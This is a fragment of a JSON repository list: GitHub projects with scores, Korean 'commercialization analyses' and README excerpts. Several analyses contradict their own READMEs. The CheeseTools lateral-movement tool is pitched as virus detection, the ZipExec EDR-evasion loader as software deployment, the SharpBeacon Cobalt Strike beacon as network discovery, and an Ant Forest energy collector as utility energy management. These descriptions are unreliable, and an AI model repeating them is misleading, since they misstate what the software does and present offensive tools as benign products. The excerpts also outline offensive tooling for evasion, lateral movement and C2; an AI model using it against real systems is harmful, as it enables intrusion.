Vue Toastification\n[![NPM](https://flat.badgen.net/npm/v/vue-toastification/next)](https://www.npmjs.com/package/vue-toastification/next)  [![Bundle](https://flat.badgen.net/bundlephobia/minzip/vue-toastification)](https://bundlephobia.com/result?p=vue-toastification@next)\n[![Vue 3](https://img.shields.io/badge/Vue-3-green)](https://img.shields.io/badge/Vue-3-green)\n\n[![Build Status](https://travis-ci.com/Maronato/vue-toastification.svg?branch=master)](https://travis-ci.com/Maronato/vue-toastification) [![codecov](https://codecov.io/gh/Maronato/vue-toastification/branch/master/graph/badge.svg)](https://codecov.io/gh/Maronato/vue-toastification) \n\n![vt](https://i.imgur.com/i2PMcTq.gif)\n\n\nLight, easy and beautiful toasts!\n\nWanna try it out? Check out the [live demo](https://maronato.github.io/vue-toastification/)!\n\n\n**Attention!** These are the docs for Vue Toastification v2, which is **only** compatible with Vue 3+\n\nIf you are using Vue 2, check out [Vue Toastification v1](https://git","composite_score":0.5065,"license_safety_tag":"safe"},{"name":"thinkeridea/go-extend","github_url":"https://github.com/thinkeridea/go-extend","stars":7,"language":"Go","license":"MIT","abandonment_months":35,"description":"# go-extend 상업화 분석\n\n## 왜 보물인가\nGo 프로그래밍 언어의 기본 기능을 확장해주는 도구로, 개발자들이 더 쉽고 빠르게 프로그램을 만들 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발 도구 SaaS**: 프로그래밍 초보자를 위한 온라인 학습 플랫폼에 내장하여 쉬운 코딩 경험 제공\n2. **기업 내부 업무 도구**: 회사의 자동","readme_excerpt":"# go-extend\n\n[![GoDoc](http://img.shields.io/badge/go-documentation-blue.svg?style=flat-square)](https://pkg.go.dev/github.com/thinkeridea/go-extend)\n[![Actions Status](https://github.com/thinkeridea/go-extend/workflows/ci/badge.svg)](https://github.com/thinkeridea/go-extend/actions?workflow=ci)\n[![codecov](https://codecov.io/gh/thinkeridea/go-extend/branch/main/graph/badge.svg)](https://codecov.io/gh/thinkeridea/go-extend)\n[![Go Report Card](https://goreportcard.com/badge/github.com/thinkeridea/go-extend)](https://goreportcard.com/report/github.com/thinkeridea/go-extend)\n[![GitHub release](https://img.shields.io/github/v/tag/thinkeridea/go-extend.svg?label=release)](https://github.com/thinkeridea/go-extend/releases)\n\ngo-extend 收集一些常用的操作函数，辅助更快的完成开发工作，并减少重复代码。\n\n它收集各种杂项函数，并进行归类，方便使用者查找，它可以大幅度提升开发效率和程序运行性能。它以保证性能为最大前提，提供有效的方法。\n针对一些标准库中的函数或者库进行一些修改，使其性能大幅度提升，但它并不用来替换标准库函数，这些函数往往会在一些场景下有效，但有些函数可以用来替换标准库函数，它们保持一致的功能，且相当安全。\n\n一些包或者函数使用示例及分析可以在我的 [博客(https://blog.thinkeridea.com)](https://blog","composite_score":0.5064,"license_safety_tag":"safe"},{"name":"yanxiu0614/subdomain3","github_url":"https://github.com/yanxiu0614/subdomain3","stars":28,"language":"Python","license":"MIT","abandonment_months":77,"description":"","readme_excerpt":"# Subdomain3\n\n![version](https://img.shields.io/badge/version-3.0-green.svg) ![stars](https://img.shields.io/github/stars/yanxiu0614/subdomain3.svg) ![forks](https://img.shields.io/github/forks/yanxiu0614/subdomain3.svg)  ![language](https://img.shields.io/badge/language-python2%2B-green.svg) ![language](https://img.shields.io/badge/language-python3%2B-green.svg)\n\n**README.md in [Chinese 中文](https://github.com/yanxiu0614/subdomain3/blob/master/README_ZH.md)**\n\n\n## Description\nSubdomain3 is a new generation of tool , It helps penetration testers to discover more information  in a shorter time than other tools.The  information includes subdomains, IP, CDN, and so on. Please enjoy it.\n\n## Screenshot\nmedium pattern for speed\n\n![](screenshot.png)\n\n## Features\n\n* More quick\n\nThree patterns for speed. User can modify the configuration(lib/config.py) file to speed-up.\n* CDN support\n\nDetermines whether the subdomain  uses CDN storage automatically,even though the dict of CDN severs not contain ","composite_score":0.5064,"license_safety_tag":"safe"},{"name":"DingZaiHub/ob-decrypt","github_url":"https://github.com/DingZaiHub/ob-decrypt","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":62,"description":"# ob-decrypt 가치 분석\n\n## 왜 보물인가\n암호화된 파일이나 데이터를 풀어서 읽을 수 있는 도구로, 접근이 제한된 정보를 복구하거나 검증해야 하는 상황에서 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 복구 서비스**: 손상된 암호화 파일을 복구해주는 온라인 도구로 월 구독 사용자 모집\n2. **기업 내부 보안 감사 솔루션**: 회","readme_excerpt":"# ob混淆还原工具\n\n| Author  | 丁仔 |\n| :-----: | :---: |\n| 微信公众号 | 逆向新手 |\n| Introduce | Python、爬虫、JS逆向 |\n\n## 使用说明\n\n### 一、ob混淆网站\n\nhttps://obfuscator.io/  \nob混淆特征：\n```javascript\n// 开头一个大数组\nvar _0xa441 = ['\\x49\\x63\\x4b\\x72\\x77\\x70\\x2f\\x44\\x6c\\x67\\x3d\\x3d', ···]\n// 自执行函数对数组进行位移\n(function (_0x56a234, _0xa44115) {\n    var _0x532345 = function (_0x549d7c) {\n        while (--_0x549d7c) {\n            _0x56a234['push'](_0x56a234['shift']());\n        }\n    };\n    _0x532345(++_0xa44115);\n}(_0xa441, 0x1d0));\n// 解密函数\nvar _0x5323 = function (_0x56a234, _0xa44115) {\n    // 里面有段自执行函数生成atob函数\n    ······\n}\n// 下方多处调用解密函数，如\nvar _0x239123 = _0x5323('\\x30\\x78\\x32\\x30', '\\x70\\x59\\x48\\x73');\n```\n\n### 二、依赖\n\n1. npm install @babel/core -g  \n如果安装了依然报以下错误：\n```javascript\nError: Cannot find module '@babel/parser'\n```\nWindows系统请在系统环境变量中添加如下后重启编辑器或电脑，npm\\node_modules路径前面根据自己的相应修改：  \n其它系统请自行搜索更改  \n```javascript\n变量名: NODE_PATH\n变量值1：C:\\Users\\Administrator\\AppData\\Roaming\\npm\\node_modules\n变量值2：C:\\Users\\Administrator\\AppData\\Roamin","composite_score":0.5064,"license_safety_tag":"unknown"},{"name":"ibm-developer-skills-network/mcino-Introduction-to-Git-and-GitHub","github_url":"https://github.com/ibm-developer-skills-network/mcino-Introduction-to-Git-and-GitHub","stars":11,"language":"Python","license":"Apache-2.0","abandonment_months":9,"description":"","readme_excerpt":"","composite_score":0.5064,"license_safety_tag":"safe"},{"name":"czy1121/settingscompat","github_url":"https://github.com/czy1121/settingscompat","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":108,"description":"# settingscompat 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱에서 설정 데이터를 다양한 버전에서 안정적으로 관리할 수 있게 해주는 기술이라 모바일 앱 개발 회사들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 플랫폼 SaaS**: 개발자들이 설정 호환성 문제를 자동으로 해결하는 클라우드 기반 서비스로 운영\n2. **","readme_excerpt":"# SettingsCompat [![](https://jitpack.io/v/czy1121/settingscompat.svg)](https://jitpack.io/#czy1121/settingscompat)\n \n特殊权限(Special Permissions)兼容库，悬浮窗权限(SYSTEM_ALERT_WINDOW)与系统设置修改权限(WRITE_SETTINGS)   \n\nAndroid 6.0以前只要在manifest中申请了权限就是默认开启的     \nAndroid 6.0+需要在manifest中申请并且通过发送Intent让用户在设置界面进行勾选  \n\n## 适配\n\n**检测**\n\n- API 23+(Android 6.0+/M) 使用 `Settings.canDrawOverlays`, `Settings.System.canWrite`\n- API 18+(Android 4.3+/JellyBean MR2) 通过反射使用 `AppOpsManager.checkOp`\n- API < 18 默认权限开启，时始终返回 true\n \n**授权** \n\n- API 23+(Android 6.0+/M) 去系统设置面板就好 `new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION)`, `new Intent(Settings.ACTION_MANAGE_WRITE_SETTINGS)` \n- API 18+(Android 4.3+/JellyBean MR2) 默认权限开启 \n- API < 18 默认权限开启，不做任何处理\n\n**切换授权状态**\n\n`AppOpsManager.setMode` 可用于`Android 4.3/4.4`修改授权状态\n\nAPI 18 添加AppOpsManager(被隐藏，在Android 4.4公开)\nAPI 21 后需要签名验证的权限`android.Manifest.permission.UPDATE_APP_OPS_STATS`，第三方应用用不了了。\n\n**ROM**\n\n有些Rom会默认禁用权限，通常都有自带的权限管理\n\nAPI 18+ 有些Rom会默认禁用权限，通常都有自带的权限管理，这时就需要检测Rom类型然后跳转到对应","composite_score":0.5063,"license_safety_tag":"safe"},{"name":"bourdakos1/capsule-networks","github_url":"https://github.com/bourdakos1/capsule-networks","stars":6,"language":"Python","license":"MIT","abandonment_months":101,"description":"# Capsule Networks 저장소 분석\n\n## 왜 보물인가\n이미지 인식 능력을 획기적으로 향상시킬 수 있는 새로운 신경망 기술로, 사람의 눈처럼 더 정확하게 사물을 인식할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의료 영상 분석 SaaS**: X선, MRI 스캔 이미지에서 질병 징후를 자동으로 감지하는 서비스\n2. **자동차 부품 검사 도구","readme_excerpt":"# Capsule Networks\nA Tensorflow implementation of Capsule Networks\n\nFor more information on Capsule Networks please read my [Medium article](https://hackernoon.com/capsule-networks-are-shaking-up-ai-heres-how-to-use-them-c233a0971952).\n\n**[Update]** Check out my [new article](https://medium.freecodecamp.org/understanding-capsule-networks-ais-alluring-new-architecture-bdb228173ddc) with a deeper explanation on how capsules work.\n\nThis repo was largely based off of [naturomics CapsNet-Tensorflow repo](https://github.com/naturomics/CapsNet-Tensorflow) with the current differences being an added `requirements.txt` and the MNIST dataset is included. Power users may want to refer to the naturomics repo for the latest versions.\n\n## Usage\nInstall the requirements and download dataset:\n```bash\npip install -r requirements.txt\npython download_data.py\n```\nStart training!\n```bash\npython main.py\n```\n\n## Testing Accuracy\n```bash\npython main.py --is_training False\n```\n\n## Visualization\nCheck out this ","composite_score":0.5063,"license_safety_tag":"safe"},{"name":"microsoft/25-days-of-serverless","github_url":"https://github.com/microsoft/25-days-of-serverless","stars":38,"language":"","license":"MIT","abandonment_months":32,"description":"","readme_excerpt":"# 25 Days of Serverless\n\n<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n\n[![All Contributors](https://img.shields.io/badge/all_contributors-2-orange.svg?style=flat-square)](#contributors-)\n\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n\n[![advent-of-serverless.gif](https://s5.gifyu.com/images/advent-of-serverless.gif)](https://gifyu.com/image/vNo5)\n\n## OOF Announcement\n*The unthinkable has happened: after weeks of community members all over the globe chipping in to help solve people's problems with serverless technology, the evil grinch's heart is starting to soften! He's still not quite ready to give up his server-stealing plot, but our whole Azure Cloud Advocacy team is flying up to the grinch's lair to help convince him to change his ways.*\n\n*As such, the team behind 25 Days of Serverless is OOF (Out Of Facility/Office) between Dec 24, 2019 and January 1, 2020. We'll not review Issues in this period of time, but encourage you to catch up on any challenges you hav","composite_score":0.5063,"license_safety_tag":"safe"},{"name":"maciejtreder/angular-universal-pwa","github_url":"https://github.com/maciejtreder/angular-universal-pwa","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":41,"description":"# angular-universal-pwa 상용화 분석\n\n## 왜 보물인가\n웹사이트를 스마트폰 앱처럼 빠르고 편하게 사용할 수 있도록 만드는 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **전자상거래 플랫폼 SaaS**: 온라인 쇼핑몰을 운영하려는 중소 사업가들에게 빠른 로딩 속도와 오프라인 접근 기능을 제공하는 서비","readme_excerpt":"# @ng-toolkit [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social&logo=twitter)](https://twitter.com/intent/tweet?text=Check%20out%20ng-toolkit%20-%20collection%20of%20great%20tools%20for%20angular&url=https://github.com/maciejtreder/ng-toolkit&via=maciejtreder&hashtags=angular,pwa,webapp,software,developers)\n\nThis project has two faces:\n\n- First, a Angular Universal PWA boilerplate, prepared for easy deployment on Serverless environment. The boilerplate contains all of the best practices and is continously evolving. [Find out more about the boilerplate here.](https://github.com/maciejtreder/ng-toolkit/tree/master/schematics/init)\n- Second, a collection of `schematics` (used with the `ng add` command) which can be applied to existing Angular projects. All `schematics` comes from the boilerplate mentioned above. The main goal is to make those schematics **interchangeably** (developer can apply them in any order)!\n\n## Wanna be a server-side Angular hero?\nIf you ","composite_score":0.5063,"license_safety_tag":"safe"},{"name":"pansong291/XQuickEnergy","github_url":"https://github.com/pansong291/XQuickEnergy","stars":7,"language":"Java","license":"Apache-2.0","abandonment_months":32,"description":"# XQuickEnergy 상품화 분석\n\n## 왜 보물인가\n에너지 관리 자동화 솔루션으로, 전기·가스 등 에너지 사용을 자동으로 모니터링하고 최적화하여 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 아파트·오피스 관리사무소가 구독하여 입주자/임차인의 에너지 사용량을 실시간 추적하고 고지서를 자동 발급하는 플랫폼\n2. ","readme_excerpt":"# XQuickEnergy\n\n[![License](https://img.shields.io/github/license/pansong291/XQuickEnergy.svg)](LICENSE)\n[![Latest Release](https://img.shields.io/github/release/pansong291/XQuickEnergy.svg)](../../releases)\n[![All Releases Download](https://img.shields.io/github/downloads/pansong291/XQuickEnergy/total.svg)](../../releases)\n\n快速收取蚂蚁森林能量  \n进入界面快速收取，非自动收取  \n更多详情请见[Wiki](../../wiki)  \n\n原地址：[https://github.com/yongjun925/autocollectenergy](https://github.com/yongjun925/autocollectenergy)  \n感谢编码美丽的四哥(@尼古拉斯·赵四)\n","composite_score":0.5063,"license_safety_tag":"safe"},{"name":"sindresorhus/promise-fun","github_url":"https://github.com/sindresorhus/promise-fun","stars":39,"language":"","license":"CC0-1.0","abandonment_months":25,"description":"# promise-fun 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 복잡한 작업을 더 쉽게 처리할 수 있도록 돕는 실용적인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 처리 속도가 중요한 클라우드 서비스(문서 변환, 이미지 처리 등)에 내장하여 성능 향상\n2. **내부 업무 도구**: 회사 직원들이 사용하는 자동화 ","readme_excerpt":"# promise-fun\n\nI intend to use this space to document my promise modules, useful promise patterns, and how to solve common problems. For now though, you can see all my promise modules below.\n\n## Contents\n\n- [Packages](#packages)\n- [FAQ](#faq)\n\n## Packages\n\n*Not accepting additions, but happy to take requests.*\n\n- **[pify](https://github.com/sindresorhus/pify)**: Promisify a callback-style function\n- **[delay](https://github.com/sindresorhus/delay)**: Delay a promise a specified amount of time\n- **[yoctodelay](https://github.com/sindresorhus/yoctodelay)**: Delay a promise a specified amount of time\n- **[p-map](https://github.com/sindresorhus/p-map)**: Map over promises concurrently\n- **[p-all](https://github.com/sindresorhus/p-all)**: Run promise-returning & async functions concurrently with optional limited concurrency\n- **[p-event](https://github.com/sindresorhus/p-event)**: Promisify an event by waiting for it to be emitted\n- **[p-debounce](https://github.com/sindresorhus/p-debounce)","composite_score":0.5063,"license_safety_tag":"unknown"},{"name":"Tylous/ZipExec","github_url":"https://github.com/Tylous/ZipExec","stars":13,"language":"Go","license":"MIT","abandonment_months":47,"description":"# ZipExec 프로젝트 분석\n\n## 왜 보물인가\n압축 파일을 직접 실행할 수 있게 만드는 기술로, 소프트웨어 배포와 설치 과정을 획기적으로 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소프트웨어 자동 배포 플랫폼 - 클라이언트가 압축파일만 받으면 자동으로 설치되는 원클릭 배포 서비스\n2. **내부 업무 도구**: 기업","readme_excerpt":"# ZipExec\nZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.\n\n\n<img src=\"https://media.giphy.com/media/Ykm4xp5NnMlz9ohJbC/giphy.gif\"/>\n\n\n## Installation\n\nThe first step as always is to clone the repo. Before you compile ZipExec you'll need to install the dependencies. To install them, run following commands:\n```\ngo get github.com/yeka/zip\n```\n\n\nThen build it\n\n```\ngo build ZipExec.go","composite_score":0.5062,"license_safety_tag":"safe"},{"name":"fastred/Optimizing-Swift-Build-Times","github_url":"https://github.com/fastred/Optimizing-Swift-Build-Times","stars":23,"language":"Swift","license":"MIT","abandonment_months":89,"description":"# Optimizing-Swift-Build-Times 분석\n\n## 왜 보물인가\n아이폰 앱을 만드는 개발자들이 코드를 수정할 때마다 기다리는 '빌드 시간'을 획기적으로 단축시켜주는 최적화 기법 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 개발사**: 아이폰 앱 개발팀 대상 '빌드 속도 최적화 컨설팅' 구독 서비스로 운영\n2. **내부 업무 도구","readme_excerpt":"# Optimizing Swift build times\n\nCollection of advice on optimizing compile times of Swift projects.\n\nSwift is constantly improving ❤️. For the time being, though, long compile times persist as a big issue when working on medium-to-large apps. The goal of this project is to gather all there is that can help you shorten your build times.\n\n👷🏻 Maintainer: [Arek Holko](https://twitter.com/arekholko). Anything missing? **Issues and pull requests welcomed!**\n\n# Table of contents\n\n- [Incremental Compilation Mode with No Optimization](#incremental-compilation-mode-with-no-optimization)\n- [Type checking of functions and expressions](#type-checking-of-functions-and-expressions)\n- [Slowly compiling files](#slowly-compiling-files)\n- [Build active architecture only](#build-active-architecture-only)\n- [dSYM generation](#dsym-generation)\n- [Third-party dependencies](#third-party-dependencies)\n- [Modularization](#modularization)\n- [XIBs](#xibs)\n- [Xcode Schemes](#xcode-schemes)\n- [Use the new Xcode bui","composite_score":0.5062,"license_safety_tag":"safe"},{"name":"BoostIO/boostnote-mobile","github_url":"https://github.com/BoostIO/boostnote-mobile","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":76,"description":"# BoostIO/boostnote-mobile 분석 보고서\n\n## 왜 보물인가\n스마트폰에서 메모와 노트를 빠르게 정리할 수 있는 앱으로, 많은 사람들이 필요로 하는 기본적인 생산성 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 메모 앱으로 구독 요금을 받고 운영하는 모델 (Notion, Evernote 경쟁)\n2. *","readme_excerpt":"# Boostnote mobile (Archived)\n\nThe mobile app is available now and actively being developed in [BoostNote.next repository](https://github.com/BoostIO/BoostNote.next).\n\n[![App Store](http://imgur.com/y8PTxr9.png \"App Store\")](https://apps.apple.com/us/app/boostnote-mobile/id1498182749)　\n[![Play Store](http://imgur.com/utWa1co.png \"Play Store\")](https://play.google.com/store/apps/details?id=com.boostio.boostnote)\n\n---\n\n## Build\n\n#### Installation\nAfter you have downloaded or cloned this repository, run `npm install` or `yarn` inside the directory.\n\n#### Usage\n- [Setting up React Native for Android](https://facebook.github.io/react-native/docs/getting-started.html#android-development-environment)\n- [Running app on Android Device](https://facebook.github.io/react-native/docs/running-on-device.html#running-your-app-on-android-devices)\n- [Running app on iOS Device](https://facebook.github.io/react-native/docs/running-on-device.html#running-your-app-on-ios-devices)\n\n#### Build and run\n- iOS `","composite_score":0.5062,"license_safety_tag":"safe"},{"name":"Mondayfirst/XXQG_TiKu","github_url":"https://github.com/Mondayfirst/XXQG_TiKu","stars":6,"language":"JavaScript","license":"GPL-3.0","abandonment_months":30,"description":"# XXQG_TiKu 상용화 분석\n\n## 왜 보물인가\n중국 공무원 시험 대비용 문제 자동 수집 시스템으로, 시험 준비자들이 필요로 하는 핵심 학습 데이터를 효율적으로 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 공무원 시험 준비 온라인 플랫폼 (SaaS)**\n구독자가 월 단위로 최신 문제 업데이트를 받아 자신의 학습 수준에 맞게 문제를 풀 수 있는 모","readme_excerpt":"<p align=\"center\">\r\n    <h2 align=\"center\">学习强国——挑战答题题库</h2>\r\n    <p align=\"center\">\r\n        <a href=\"https://github.com/mondayfirst/XXQG_TiKu/blob/main/LICENSE\" target=\"blank\">\r\n            <img src=\"https://img.shields.io/github/license/mondayfirst/XXQG_TiKu\" alt=\"license\"/>\r\n        </a>\r\n        <a href=\"https://github.com/mondayfirst/XXQG_TiKu/search?l=javascript\" target=\"blank\">\r\n            <img src=\"https://img.shields.io/github/languages/top/mondayfirst/XXQG_TiKu\" alt=\"languages\"/>\r\n        </a>\r\n    </p>\r\n</p>\r\n\r\n\r\n简单胜过繁杂  \r\n\r\n---\r\n##### 一、注意：  \r\n1. 格式：  \r\n&emsp;&emsp;json文件中的格式是：`问题|答案1|答案2|...:正确答案`。问题(去除空格)，与可选答案之间以`|`符号分隔。  \r\n&emsp;&emsp;`题库_排序版.json`为保证题目的唯一性，先去除可选答案的序号，再对几个选项进行列表排序。  \r\n2. 预览  \r\n&emsp;&emsp;首页不再显示题目，可点击`题库_排序版.md`文件全览题目  \r\n3. 数据来源  \r\n&emsp;&emsp;根据安卓手机无障碍服务获取控件内容，并在`挑战答题`页面自动答题获得全部题目与正确答案。  \r\n&emsp;&emsp;因获取时间跨度较长，同一题目可能存在不同版本，一并保留。\r\n4. 脚本  \r\n&emsp;&emsp;详情见`xxqg_tiku_client/建立题库.js`代码文件（不再支持本地json），注释个人认为比较清楚。有问题提issue。  \r\n5. 服务器  \r\n&emsp;&emsp;服务器端仅提供","composite_score":0.5061,"license_safety_tag":"restricted"},{"name":"klezVirus/CheeseTools","github_url":"https://github.com/klezVirus/CheeseTools","stars":20,"language":"C#","license":"GPL-3.0","abandonment_months":58,"description":"# CheeseTools 상용화 분석\n\n## 왜 보물인가\n바이러스 탐지 및 분석 기술로, 보안이 중요한 모든 조직에서 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업용 자동 바이러스 검사 플랫폼으로 월 구독 형태로 제공\n- **내부 업무 도구**: 대기업 IT팀의 서버 보안 감시 및 위협 대응 시스템으로 통합\n- **A","readme_excerpt":"# CheeseTools\n\nThis repository has been made basing onto the already existing [MiscTool][1], so big shout-out to [rasta-mouse](https://twitter.com/rasta_mouse) for releasing them and for giving me the right motivation to work on them.\n\n## CheeseExec\nCommand Exec / Lateral movement via PsExec-like functionality.  Must be running in the context of a privileged user.\nThe tool is based on [rasta-mouse](https://twitter.com/rasta_mouse) CsExec, but is designed to allow additional control over the service creation, specifically:\n- Create (Search if the service exists, if not, tries to create it)\n- Start (Search if the service exists and is stopped, if that's the case attempts to start it; if not, tries to create it and start it)\n- Stop (Search if the service exists and is running, if that's the case attempts to stop it)\n- Delete (Search if the service exists and is running, if that's the case attempts to stop it than delete it, otherwise it deletes it)\n```\nCheeseExec.exe <targetMachine> <serv","composite_score":0.5061,"license_safety_tag":"restricted"},{"name":"estefaniacn/freecodecamp-curso-javascript","github_url":"https://github.com/estefaniacn/freecodecamp-curso-javascript","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":58,"description":"# JavaScript 배우기 저장소 분석\n\n## 왜 보물인가\n**무료로 JavaScript(웹사이트를 만드는 프로그래밍 언어) 강좌를 배울 수 있는 학습 자료입니다.**\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼(SaaS)**: 초보자용 프로그래밍 강좌 구독 서비스로 월 구독료를 받으며 판매\n2. **기업 직원 교육 도구(내부 도구)**: ","readme_excerpt":"# Aprende JavaScript - Curso Completo desde Cero\nEste repositorio contiene el código del curso \"Aprende JavaScript - Curso Completo desde Cero\" creado para freeCodeCamp.\n\nEl curso de **9+ horas** está diseñado para que aprendas JavaScript paso a paso a través de la práctica con ejemplos y proyectos cortos que te ayudarán a aplicar tu conocimiento. Los temas están enfocados en un concepto específico pero aquí los he dividido en categorías principales para darte una idea general del contenido.\n\n## 🔹 Contenido\n- Primeros pasos\n- Variables en JavaScript\n- Tipos de datos en JavaScript\n- Operaciones aritméticas\n- Operadores de comparación y lógicos\n- Cadenas de caracteres en JavaScript\n- Arreglos en JavaScript\n- Métodos de arreglos (.push() ,  .pop() , .shift() , .unshift())\n- Variables globales y locales\n- Funciones en JavaScript\n- Condicionales en JavaScript\n- Sentencias Switch en JavaScript\n- Objetos en JavaScript \n- Ciclos for y ciclos while en JavaScript\n- Números aleatorios en JavaScri","composite_score":0.5061,"license_safety_tag":"unknown"},{"name":"yuzhengyang/Everything","github_url":"https://github.com/yuzhengyang/Everything","stars":5,"language":"C#","license":"unknown","abandonment_months":105,"description":"# yuzhengyang/Everything 프로젝트 분석\n\n## 왜 보물인가\n프로젝트 이름과 설명이 불충분하여 실제 기능을 파악할 수 없으며, 5개의 별과 6년 이상의 미업데이트 상태로 보아 완성도나 시장 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 직원들이 다양한 작업을 한곳에서 관리할 수 있는 통합 플랫폼\n- *","readme_excerpt":"# Everything\n探索Everything背后的技术（USN和MFT）\n\nEverything　搜索文件很快，就是利用的　NTFS　分区的　USN　功能，本例主要整理相关源码和自己的测试程序，\n其中　Everything　文件夹中就是个人整理的测试程序，\n\n测试程序功能包括：\n1. NTFS磁盘USN查询； \n2. 根据USN继续查询； \n3. 根据文件编号继续查询； \n4. 创建USN（激活USN状态）；\n\n如果有深入学习，可以查看　“Everything 软件及源码资料”　文件夹，里面有源码可以学习。\n\n＝＝＝＝＝＝＝＝＝＝＝＝以上修改日期：2017年9月29日＝＝＝＝＝＝＝＝＝＝＝＝\n","composite_score":0.5061,"license_safety_tag":"unknown"},{"name":"dustinvtran/latex-templates","github_url":"https://github.com/dustinvtran/latex-templates","stars":8,"language":"TeX","license":"unknown","abandonment_months":61,"description":"# LaTeX Templates 저장소 분석\n\n## 왜 보물인가\n논문, 보고서, 이력서 등을 전문적인 형태로 빠르게 만들 수 있는 템플릿 모음으로, 복잡한 문서 작성을 단순화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 문서 작성 플랫폼에서 \"1초 논문 생성\" 템플릿 기능으로 제공\n2. **내부 업무 도구**: 대학교 행정팀이 졸","readme_excerpt":"# LaTeX\n\nWhen writing a new document, I begin from one of these templates. I\nhave found these fundamental to my workflow.\n\n## Setup\n\nYour preferences may vary.\n\nUse [`latexmk`](https://www.ctan.org/pkg/latexmk/?lang=en). It's\npowerful. My day-to-day use is: 1. write text in Vim; 2. run `latexmk -C`\nand `latexmk -pdf main` in the terminal; 3. ??? profit.\n\nIn terms of packages:\n\n+ I use MacTeX.\n+ I use additional LaTeX packages listed\n  [here](https://github.com/dustinvtran/dotfiles/tree/laptop-mac/Library/texmf/tex/latex).\n+ I use mtpro2 as a default font. It is proprietary and requires\n  manual installation.\n\n## Curriculum Vitae\n<img src=\"img/cv.png\" height=\"500\">\n\n## Papers\n<img src=\"img/papers.png\" height=\"500\">\n\n## Lectures\n<img src=\"img/lectures.png\" height=\"500\">\n\n## Problem Sets\n<img src=\"img/problem-sets.png\" width=\"600\">\n\n## Other Examples\n\nI use the `minted` package for code snippets.\n\n<img src=\"img/code.png\" height=\"400\">\n\nI'm a big fan of a custom `\\draftdisclaimer` command ","composite_score":0.5061,"license_safety_tag":"unknown"},{"name":"hypercube-lab/hypercube","github_url":"https://github.com/hypercube-lab/hypercube","stars":15,"language":"Rust","license":"GPL-3.0","abandonment_months":45,"description":"# Hypercube Lab/Hypercube 분석\n\n## 왜 보물인가\n복잡한 데이터를 시각적으로 이해하기 쉽게 만들어주는 도구로, 데이터 분석이 필요한 모든 비즈니스에서 의사결정 속도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 기업용 대시보드 플랫폼으로 월 구독 모델로 판매 (의료, 금융, 소매 기업들이 고객 데이터 ","readme_excerpt":"<div align=\"center\">\n<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![All Contributors](https://img.shields.io/badge/all_contributors-12-orange.svg?style=flat-square)](#contributors-)\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n  <h1> HyperCube Core </h1>\n</div>\n\n![banner](https://i.imgur.com/N4NsDhi.png)\n\n[![HyperCube crate](https://img.shields.io/crates/v/hypercube.svg)](https://crates.io/crates/hypercube)\n[![HyperCube documentation](https://docs.rs/hypercube-lab/badge.svg)](https://docs.rs/hypercu)\n[![Build status](https://badge.buildkite.com/8cc350de251d61483db98bdfc895b9ea0ac8ffa4a32ee850ed.svg?branch=master)](https://buildkite.com/hypercube-lab/hypercube/builds?branch=master)\n[![codecov](https://codecov.io/gh/hypercube-lab/hypercube/branch/master/graph/badge.svg)](https://codecov.io/gh/hypercube-lab/hypercube)\n\n\n# What is HyperCube\n\nHyperCube is a free and open source blockchain project for everyone to use.\n\n\n[HyperCube Wiki](https://github.com/hypercube-la","composite_score":0.5061,"license_safety_tag":"restricted"},{"name":"mai1zhi2/SharpBeacon","github_url":"https://github.com/mai1zhi2/SharpBeacon","stars":8,"language":"C#","license":"unknown","abandonment_months":58,"description":"# SharpBeacon 분석 보고서\n\n## 왜 보물인가\n네트워크에서 숨겨진 기기나 서비스를 찾아내는 보안 도구로, 시스템 관리자와 보안 전문가에게 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 솔루션 SaaS**: 회사 네트워크의 숨겨진 위험 요소를 자동으로 감지하는 구독형 서비스\n2. **IT 관리 내부 도구**: 대기업의 정보보안","readme_excerpt":"# 如何使用\n启动teamserver后会生成beacon_keys文件，我们需要提取出里面的RSA 公私密钥后，复制到config.cs中，并在config.cs修改回传的URL和生成hash的随机数。\n# How to use\nFirstly, starting TeamServer and you got .cobaltstrike.beacon_keys meanwhile configurate listener etc.\nSecondly, compiling SharpBeacon with VisualStudio after you changed url and RSA private key and public key in config.cs\nAnd Then click sharpbeacon.exe. Once you got one beacon session and have fun!\nBTW this project as just a beacon which 